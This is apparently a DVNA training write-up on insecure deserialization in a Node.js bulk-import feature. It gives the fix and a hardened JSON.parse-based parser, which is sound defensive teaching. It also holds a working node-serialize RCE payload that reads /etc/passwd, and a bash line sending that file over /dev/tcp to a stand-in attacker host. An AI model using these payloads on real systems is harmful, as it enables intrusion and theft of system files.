The Legacy Bulk Import feature at http://127.0.0.1:9090/app/bulkproducts?legacy=true deserializes the uploaded data insecurely, allowing remote code execution.
To execute code we need to provide a serialized object to the server. In this case the object (shown below) is a function that uses the child_process library to invoke bash -c -- "cat /etc/passwd > /dev/tcp/attacker-ip/nc-port". The function is turned into an Immediately Invoked Function Expression (IIFE) by appending () to the end of the function, so it runs as soon as it is deserialized.
The following input will trigger the vulnerability:
{"rce":"_$$ND_FUNC$$_function (){require('child_process').exec('id;cat /etc/passwd', function(error, stdout, stderr) { console.log(stdout) });}()"}
which is the serialized version of:
var y = {
  rce : function(){
    require('child_process').exec('id;cat /etc/passwd', function(error, stdout, stderr) { console.log(stdout) });
  }(),
}
Vulnerable code snippet
core/appHandler.js
...
module.exports.bulkProductsLegacy = function (req, res) {
  // TODO: Deprecate this soon
  if (req.files.products) {
    var products = serialize.unserialize(req.files.products.data.toString('utf8'))
...
Solution
Since the feature essentially only needs to parse JSON, the data can be parsed securely with JSON.parse instead.
core/appHandler.js
...
module.exports.bulkProductsLegacy = function (req, res) {
  // TODO: Deprecate this soon
  if (req.files.products) {
    var products = JSON.parse(req.files.products.data.toString('utf8'))
...
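To show why the JSON.parse replacement is safe, and how to go one step further, here is an added example (not DVNA's own code) of a hardened bulk-import parser: it parses the upload with JSON.parse, rejects any value carrying the node-serialize function marker so such uploads can be logged, and validates a simple product schema (the name and price fields are assumed for illustration).

```javascript
'use strict';

// Prefix node-serialize puts in front of a serialized function. Under
// JSON.parse it stays an inert string; we still reject it so the upload
// is refused and can be logged by the caller.
const FUNC_MARKER = '_$$ND_FUNC$$_';

class BulkImportError extends Error {}

// Walk every string in the parsed value looking for the function marker.
function containsSerializedFunction(value) {
  if (typeof value === 'string') return value.startsWith(FUNC_MARKER);
  if (value && typeof value === 'object') {
    return Object.values(value).some(containsSerializedFunction);
  }
  return false;
}

// Hardened replacement for serialize.unserialize in bulkProductsLegacy.
function parseBulkProducts(body) {
  let data;
  try {
    data = JSON.parse(body); // data only: no functions are ever materialised
  } catch (e) {
    throw new BulkImportError('bulk import is not valid JSON');
  }
  if (containsSerializedFunction(data)) {
    throw new BulkImportError('upload contains a serialized function');
  }
  if (!Array.isArray(data)) {
    throw new BulkImportError('bulk import must be a JSON array of products');
  }
  return data.map((p, i) => {
    if (p === null || typeof p !== 'object' || Array.isArray(p)) {
      throw new BulkImportError(`product ${i} is not an object`);
    }
    if (typeof p.name !== 'string' || p.name.length === 0) {
      throw new BulkImportError(`product ${i} has an invalid name`);
    }
    if (typeof p.price !== 'number' || !Number.isFinite(p.price) || p.price < 0) {
      throw new BulkImportError(`product ${i} has an invalid price`);
    }
    return { name: p.name, price: p.price }; // copy only whitelisted fields
  });
}

// Constructed inputs: a benign upload and the page's serialized-function payload.
const BENIGN_UPLOAD = '[{"name":"Widget","price":9.99},{"name":"Gadget","price":20}]';
const MALICIOUS_UPLOAD =
  '{"rce":"_$$ND_FUNC$$_function (){require(\'child_process\').exec(\'id\');}()"}';

// Wraps the parser in a verdict object suitable for an HTTP handler to act on.
function importVerdict(body) {
  try {
    return { ok: true, products: parseBulkProducts(body) };
  } catch (e) {
    if (e instanceof BulkImportError) return { ok: false, reason: e.message };
    throw e;
  }
}
```

Running importVerdict(MALICIOUS_UPLOAD) returns a rejection without ever touching child_process, whereas serialize.unserialize would have executed the IIFE during deserialization.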
Fixes
Implemented in the following files:
- core/appHandler.js
The fix has been implemented in this commit
Recommendation
- Use secure and recommended ways to implement application features
- Ensure that potentially vulnerable legacy features aren't accessible
Reference